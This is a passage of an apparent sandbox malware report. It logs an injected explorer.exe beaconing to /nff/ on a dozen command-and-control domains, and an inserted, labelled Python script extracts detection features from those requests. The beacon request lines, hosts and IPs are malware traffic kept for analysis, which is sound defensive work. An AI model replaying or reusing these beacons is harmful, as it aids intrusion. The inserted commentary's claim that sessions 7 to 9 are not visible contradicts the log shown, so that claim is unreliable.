                                                                                Jul 19, 2021 20:22:23.152496099 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152503014 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152523041 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152535915 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152545929 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152569056 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152570963 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152606964 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152659893 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.467056036 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467194080 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467196941 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.467259884 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467295885 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.467340946 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467351913 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.467398882 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467442036 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.467463017 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467519045 CEST44349746133.130.104.18192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                Jul 19, 2021 20:26:47.419030905 CEST8.8.8.8192.168.2.30x7b81No error (0)www.amazonautomationbusiness.com172.67.206.203A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:27:28.061136961 CEST8.8.8.8192.168.2.30xc066No error (0)www.ooweesports.com45.33.252.45A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:27:51.229108095 CEST8.8.8.8192.168.2.30x9638No error (0)www.gentrypartyof8.comgentrypartyof8.comCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:27:51.229108095 CEST8.8.8.8192.168.2.30x9638No error (0)gentrypartyof8.com66.235.200.146A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:28:10.031167030 CEST8.8.8.8192.168.2.30xa07bNo error (0)www.dunn-labs.comdunn-labs.comCNAME (Canonical name)IN (0x0001)
                                                                                Jul 19, 2021 20:28:10.031167030 CEST8.8.8.8192.168.2.30xa07bNo error (0)dunn-labs.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:28:32.473375082 CEST8.8.8.8192.168.2.30xa9eaNo error (0)www.tearor.com212.32.237.90A (IP address)IN (0x0001)
                                                                                Jul 19, 2021 20:28:52.840178013 CEST8.8.8.8192.168.2.30xaff2Name error (3)www.creditmystartup.comnonenoneA (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • www.oubacm.com
                                                                                • www.mothererph.com
                                                                                • www.howtovvbucks.com
                                                                                • www.mikecdmusic.com
                                                                                • www.pacleanfuel.com
                                                                                • www.foeweifgoor73dz.com
                                                                                • www.thehomechef.global
                                                                                • www.yellow-wink.com
                                                                                • www.amazonautomationbusiness.com
                                                                                • www.ooweesports.com
                                                                                • www.gentrypartyof8.com
                                                                                • www.dunn-labs.com
                                                                                • www.tearor.com
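Every host in this graph is contacted in turn by the injected explorer.exe with the same request shape (see the HTTP Packets section that follows): the path /nff/, two query parameters, a seven-byte body of NUL bytes on a GET, and Connection: close. The Python below is an added example and is not part of the Joe Sandbox report or of the malware; it takes the Host headers, request lines, resolved addresses and response status lines transcribed from the report's HTTP Packets and DNS Answers tables (only the ten sessions whose request is fully visible there; sessions 7 to 9 are not, so they are omitted) and extracts what an analyst turns into detection logic: the parameter that is constant across all hosts, the length of the varying one, and the names that resolve to a shared address. The parsing is generic and does not hard-code the parameter names; the tuple layout and function names are this example's own.

```python
"""Triage the HTTP beacons recorded in this report (added example)."""
from collections import defaultdict

# Constructed from the report's HTTP Packets and DNS Answers tables:
# (Host header, request line, resolved address, first response line or None
# when no response was captured for that session).
SESSIONS = [
    ("www.oubacm.com", "GET /nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o HTTP/1.1", "45.193.166.57", "HTTP/1.1 404 Not Found"),
    ("www.mothererph.com", "GET /nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg HTTP/1.1", "34.102.136.180", "HTTP/1.1 403 Forbidden"),
    ("www.howtovvbucks.com", "GET /nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj HTTP/1.1", "81.17.18.196", "HTTP/1.1 302 Found"),
    ("www.mikecdmusic.com", "GET /nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o HTTP/1.1", "184.168.131.241", "HTTP/1.1 301 Moved Permanently"),
    ("www.pacleanfuel.com", "GET /nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl HTTP/1.1", "35.208.122.142", "HTTP/1.1 301 Moved Permanently"),
    ("www.foeweifgoor73dz.com", "GET /nff/?D48p=yLp+OGFnl0jg7pOzvTf//aMS5CTocG0VRGMnH1GHhYzZCkZUh0GgSDI2xq5DNsTFnZjT&-ZgX=tR-DSFa8o HTTP/1.1", "34.102.136.180", "HTTP/1.1 403 Forbidden"),
    ("www.thehomechef.global", "GET /nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB HTTP/1.1", "198.50.252.64", "HTTP/1.1 200 OK"),
    ("www.gentrypartyof8.com", "GET /nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o HTTP/1.1", "66.235.200.146", None),
    ("www.dunn-labs.com", "GET /nff/?-ZgX=tR-DSFa8o&D48p=23vdk0INmHdYoMyjDJpAXxw5aErMVqufSgZPm4X7AcKozm0yVvV2ivtCtqAjwFsJpdV9 HTTP/1.1", "34.102.136.180", "HTTP/1.1 403 Forbidden"),
    ("www.tearor.com", "GET /nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o HTTP/1.1", "212.32.237.90", "HTTP/1.1 302 Found"),
]


def split_query(request_line):
    """Return (path, [(key, value), ...]) for an HTTP request line.

    The query is split on '&' and on the first '=' only and is deliberately
    NOT percent-decoded: the payload is base64-like and contains '+' and '/',
    and urllib.parse.parse_qsl would rewrite '+' as a space, changing both the
    bytes and (after a later strip) possibly the length you measure.
    """
    _method, target, _version = request_line.split(" ", 2)
    path, _sep, query = target.partition("?")
    params = []
    for pair in filter(None, query.split("&")):
        key, _sep, value = pair.partition("=")
        params.append((key, value))
    return path, params


def constant_params(sessions):
    """Map path -> set of (key, value) pairs present, unchanged, in every
    request to that path. Parameter order differs between requests here, so
    we intersect sets rather than compare positions."""
    seen = {}
    for _host, line, _addr, _status in sessions:
        path, params = split_query(line)
        pairs = set(params)
        seen[path] = pairs if path not in seen else seen[path] & pairs
    return seen


def payload_lengths(sessions):
    """Map host -> lengths of the non-constant parameter values. One fixed
    length across unrelated hosts points at an encoded structure rather than
    at per-site query strings."""
    const = constant_params(sessions)
    out = {}
    for host, line, _addr, _status in sessions:
        path, params = split_query(line)
        out[host] = [len(v) for k, v in params if (k, v) not in const[path]]
    return out


def hosts_by_address(sessions):
    """Map address -> hosts, keeping only addresses that more than one host
    resolved to. Several unrelated names on one address is the first thing
    to check before deciding which contacted host is worth blocking."""
    groups = defaultdict(set)
    for host, _line, addr, _status in sessions:
        groups[addr].add(host)
    return {addr: hosts for addr, hosts in groups.items() if len(hosts) > 1}


def status_summary(sessions):
    """Map host -> numeric HTTP status, or None when no reply was recorded."""
    return {host: (int(status.split(" ", 2)[1]) if status else None)
            for host, _line, _addr, status in sessions}


def triage(sessions):
    """Human-readable summary lines built from the three checks above."""
    lines = []
    for path, pairs in constant_params(sessions).items():
        hosts = {h for h, l, _a, _s in sessions if split_query(l)[0] == path}
        lines.append(f"path {path}: constant {sorted(pairs)} across {len(hosts)} hosts")
    for addr, hosts in hosts_by_address(sessions).items():
        lines.append(f"address {addr} shared by {sorted(hosts)}")
    for host, code in status_summary(sessions).items():
        lines.append(f"{host}: {'no response' if code is None else code}")
    return lines


if __name__ == "__main__":
    print("\n".join(triage(SESSIONS)))
```

Run against the transcribed sessions, the output shows one constant pair (-ZgX=tR-DSFa8o) on /nff/ across all ten hosts, a 68-character varying value on every request, and three of the ten names resolving to 34.102.136.180. For a proxy or IDS rule, the stable features are the fixed key/value pair and the fixed-length second parameter, not the host names, which change from sample to sample.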

                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49750 | 45.193.166.57 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:23:41.118997097 CEST | 6161 | OUT | GET /nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.oubacm.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:23:41.469955921 CEST | 6161 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 19 Jul 2021 18:23:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49751 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:24:01.766391039 CEST | 6162 | OUT | GET /nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg HTTP/1.1
                                                                                Host: www.mothererph.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:24:01.904855967 CEST | 6163 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Mon, 19 Jul 2021 18:24:01 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60ef679d-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49767 | 66.235.200.146 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:27:51.274418116 CEST | 6319 | OUT | GET /nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.gentrypartyof8.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49768 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:28:10.074420929 CEST | 6320 | OUT | GET /nff/?-ZgX=tR-DSFa8o&D48p=23vdk0INmHdYoMyjDJpAXxw5aErMVqufSgZPm4X7AcKozm0yVvV2ivtCtqAjwFsJpdV9 HTTP/1.1
                                                                                Host: www.dunn-labs.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:28:10.212614059 CEST | 6321 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Mon, 19 Jul 2021 18:28:10 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60ef67ac-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49770 | 212.32.237.90 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:28:32.524736881 CEST | 6330 | OUT | GET /nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.tearor.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:28:32.593398094 CEST | 6330 | IN | HTTP/1.1 302 Found
                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                connection: close
                                                                                content-length: 11
                                                                                date: Mon, 19 Jul 2021 18:28:31 GMT
                                                                                location: http://survey-smiles.com
                                                                                server: nginx
                                                                                set-cookie: sid=1f40a452-e8bf-11eb-b30c-7ad82c50a0ff; path=/; domain=.tearor.com; expires=Sat, 06 Aug 2089 21:42:39 GMT; max-age=2147483647; HttpOnly
                                                                                Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                Data Ascii: Redirecting


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49753 | 81.17.18.196 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:24:45.537377119 CEST | 6164 | OUT | GET /nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj HTTP/1.1
                                                                                Host: www.howtovvbucks.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:24:45.641721010 CEST | 6165 | IN | HTTP/1.1 302 Found
                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                connection: close
                                                                                content-length: 11
                                                                                date: Mon, 19 Jul 2021 18:24:44 GMT
                                                                                location: http://survey-smiles.com
                                                                                server: nginx
                                                                                set-cookie: sid=97f43c84-e8be-11eb-b907-b5ecbe7de670; path=/; domain=.howtovvbucks.com; expires=Sat, 06 Aug 2089 21:38:52 GMT; max-age=2147483647; HttpOnly
                                                                                Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                Data Ascii: Redirecting


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49754 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:25:04.092866898 CEST | 6166 | OUT | GET /nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.mikecdmusic.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:25:04.370007992 CEST | 6166 | IN | HTTP/1.1 301 Moved Permanently
                                                                                Server: nginx/1.16.1
                                                                                Date: Mon, 19 Jul 2021 18:25:04 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Location: http://www.teacherspayteachers.com/Store/Mike-Collins-dowden-Composer?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49755 | 35.208.122.142 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:25:25.115896940 CEST | 6167 | OUT | GET /nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl HTTP/1.1
                                                                                Host: www.pacleanfuel.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:25:25.272996902 CEST | 6168 | IN | HTTP/1.1 301 Moved Permanently
                                                                                Server: nginx
                                                                                Date: Mon, 19 Jul 2021 18:25:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 162
                                                                                Connection: close
                                                                                Location: https://www.pacleanfuel.com/nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl
                                                                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                X-HTTPS-Enforce: 1
                                                                                X-Proxy-Cache-Info: DT:1
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49762 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:25:45.584847927 CEST | 6301 | OUT | GET /nff/?D48p=yLp+OGFnl0jg7pOzvTf//aMS5CTocG0VRGMnH1GHhYzZCkZUh0GgSDI2xq5DNsTFnZjT&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.foeweifgoor73dz.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:25:45.722975016 CEST | 6302 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Mon, 19 Jul 2021 18:25:45 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60ef6775-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49763 | 198.50.252.64 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:26:06.282283068 CEST | 6303 | OUT | GET /nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB HTTP/1.1
                                                                                Host: www.thehomechef.global
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:26:06.413971901 CEST | 6304 | IN | HTTP/1.1 200 OK
                                                                                Date: Mon, 19 Jul 2021 18:26:06 GMT
                                                                                Server: Apache
                                                                                Cache-Control: no-cache, must-revalidate
                                                                                Connection: close
                                                                                Transfer-Encoding: chunked
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Data Ascii: 18c4<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Domain parked by Instra</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="description" content="" /><meta name="keywords" content="" /><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"><link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous"><style>*{margin:0;padding:0; box-sizing: border-box;}*::after, *::before { box-sizing: border-box;}html, body {height:100%;width:100%; overflow-x: hidden;font-family: Lato, Arial, sans-serif; font-size: 16px; line-height: 1.42857 }table {height:100%;width:100%;table-layout:static;border-collapse:coll


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
7          | 192.168.2.3 | 49764       | 34.102.136.180 | 80               | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:26:26.748606920 CEST | 6310 | OUT | GET /nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o HTTP/1.1
                                                                                Host: www.yellow-wink.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:26:26.888226032 CEST | 6311 | IN | HTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Mon, 19 Jul 2021 18:26:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60ef6795-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
8          | 192.168.2.3 | 49765       | 104.21.53.7    | 80               | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 19, 2021 20:26:47.463435888 CEST | 6312 | OUT | GET /nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd HTTP/1.1
                                                                                Host: www.amazonautomationbusiness.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Jul 19, 2021 20:26:47.526154995 CEST | 6313 | IN | HTTP/1.1 301 Moved Permanently
                                                                                Date: Mon, 19 Jul 2021 18:26:47 GMT
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
